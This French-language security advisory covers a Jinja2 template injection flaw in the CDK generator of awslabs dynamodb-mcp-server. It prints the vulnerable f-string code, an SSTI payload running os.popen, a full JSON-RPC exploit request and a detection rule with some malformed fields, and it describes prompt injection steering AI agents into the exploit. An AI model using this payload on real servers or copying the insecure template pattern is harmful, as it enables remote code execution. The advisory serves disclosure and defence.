Aller au contenu

CVE-2026-85654 : injection de template SSTI et RCE dans awslabs dynamodb-MCP-Server

HERMES

SCORE DE MENACE HERMES & ÉVALUATION D'INFRASTRUCTURE AGENTIQUE

Cible : awslabs dynamodb-mcp-server (awslabs.dynamodb_mcp_server.cdk_generator (Template Engine))
Confiance : 98%
97 / 100
CRITIQUE

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 19 / 20
Activité de menace 18 / 20
Militarisation 18 / 20
Exposition 18 / 20
Prévalence 17 / 20
Impact 19 / 20
Maturité de l'exploit 18 / 20
Potentiel d'attaque en chaîne 18 / 20
⚖️ Divergence & Justification opérationnelle

Le score CVSS v3.1 est de 9.8 (Critique) et le score Hermes Threat Score est calculé à 97 (CRITIQUE). La génération automatique de code d'infrastructure par des assistants IA via ce composant MCP expose le serveur à une exécution de code sans restriction.

🕸️ Graphe de connaissances connecté & Provenance

CVE-2026-85654: awslabs dynamodb-mcp-server CDK Generator Template Injection RCEVULNÉRABILITÉ

Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTAWS MCP Server Suite
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Confirmed security vulnerability in AWS MCP Server Suite documented in Hermes dossier.”

Preuves vérifiées associées :

ParamètreSpécification TechniqueContexte de Menace
Identifiant CVECVE-2026-85654Menaces IA Agentique & Protocole MCP
Produit cibléawslabs dynamodb-mcp-serverAmazon Web Services / MCP Community
Composant affectéawslabs.dynamodb_mcp_server.cdk_generator (Template Engine)Orchestrateur et couche d’outils agentiques
Nature de la failleCWE-1336: Improper Neutralization of Special Elements Used in a Template Engine (SSTI)Violation d’intégrité et d’exécution
Versions vulnérablesall versions prior to 0.4.3Environnements en production
Correctif disponible0.4.3Mise à jour impérative

La fonction generate_cdk_template() concaténait directement les paramètres reçus du client MCP :

# Concaténation non sécurisée dans le template
template_str = f"""
from aws_cdk import aws_dynamodb as dynamodb
table = dynamodb.Table(
self, '{params.get('table_name')}',
partition_key=dynamodb.Attribute(name='{params.get('partition_key')}', type=dynamodb.AttributeType.STRING)
)
"""
template = jinja2.Template(template_str)
return template.render()

L’injection de la chaîne {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }} déclenche l’exécution immédiate du binaire id lors du rendu Jinja2.

+----------------------------------------------------------------------------------------------------+
| CYCLE D'ATTAQUE CVE-2026-85654 |
+----------------------------------------------------------------------------------------------------+
[Attaquant / Injection de Prompt]
│
│ [1] Émission du payload ciblant l'interface d'outil ou l'orchestrateur
▼
[awslabs dynamodb-mcp-server]
│
├───► 1. Ingestion par awslabs.dynamodb_mcp_server.cdk_generator (Template Engine)
│ - Échec de validation, absence de filtrage ou contournement de sandbox
│
├───► 2. Exécution / Mutation d'état
│ - Exécution de commandes OS ou exfiltration d'identifiants
│
▼
[Infrastructure Cible Compromise]
│
└───► Vol de données, prise de contrôle du serveur ou persistance
+----------------------------------------------------------------------------------------------------+

{
"jsonrpc": "2.0",
"id": 42,
"method": "tools/call",
"params": {
"name": "generate_table_cdk",
"arguments": {
"table_name": "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}",
"partition_key": "id"
}
}
}

title: DynamoDB MCP Server Template Injection
id: 85654c01-e654-4a1b-8f21-dynamodbmcp01
status: high
description: Detects Jinja2 template injection syntax in JSON-RPC tool parameters destined for DynamoDB MCP server.
author: Hermes Codex Detection Engineering
date: 2026-09-06
logsource:
product: mcp
service: dynamodb_server
detection:
selection:
payload|contains:
- '__globals__'
- '__builtins__'
- 'popen'
- '__import__'
condition: selection
level: critical

  1. Appliquer les correctifs : mettre à jour awslabs dynamodb-mcp-server vers la version 0.4.3 sans délai.
  2. Restreindre les outils MCP : vérifier les déclarations d’outils et isoler les exécutions dans des conteneurs sandboxés éphémères.
  3. Auditer les journaux système : examiner les logs d’exécution pour repérer d’éventuels processus enfants anormaux ou appels réseau suspects.
  4. Appliquer le moindre privilège : restreindre les comptes de service associés aux agents sur les bases de données et les clés cloud.